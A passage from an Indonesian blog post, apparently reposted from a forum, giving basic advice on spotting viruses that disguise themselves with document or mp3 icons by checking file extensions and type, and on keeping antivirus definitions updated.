    Jika Anda kurang suka dengan munculnya tree view pada jendela explorer atau file yang ingin dibuka bukanlah sebuah folder. Tetapi Anda khawatir virusnya bericon mirip dokumen word atau file mp3. Ada cara lain untuk mengatasinya yaitu dengan melihat ekstensi file tersebut. Jika ekstensi sebuah file adalah .exe tetapi iconnya mirip dokumen word atau yang lain maka bisa dipastikan file tersbut adalah sebua virus. Atau bisa juga dengan cara menset agar file ditampilkan secara detail dengan mengklik menu View pada explorer kemudian pilih Details. Jika sebuah folder atau dokumen word memiliki Type file Application, mungkin file tersebut adalah virus



4. Update Antivirus secara berkala

Antivirus saya sudah yang terbaru dan mahal lho apa perlu diupdate? Pertanyaan itu sering saya terima dari teman-teman saya. Antivirus yang terbaru dan mahal bukan jaminan bisa mengenali semua virus karena mungkin saja virus itu dibuat setelah Antivirus itu dibuat. Jadi virus tersebut tidak akan ada pada database Antivirus tersebut. Kebanyakan Antivirus dapat mengenali virus karena virus tersebut ada pada database virus mereka. Jika tidak, virus tersebut tidak akan dikenali.

Jadi update Antivirus sangat dibutuhkan yaitu untuk menambahkan nama-nama virus baru pada daftar virus yang ada pada database virus Antivirus tersebut. Seberapa sering Antivirus harus diupdate? Kalau bisa setiap hari. Tapi kalau Anda tidak mempunyai sambungan internet atau ga bisa tiap hari download virus defenition di Warnet karena ga ada waktu atau ga da duit, paling tidak seminggu sekali sudah cukup. Tapi tidak jamin lho Antivirusnya up to date.
 
Sumber: forumbinushacker
:

Read more

 
Design by ThemeShift | Bloggerized by Lasantha - Free Blogger Templates | Best Web Hosting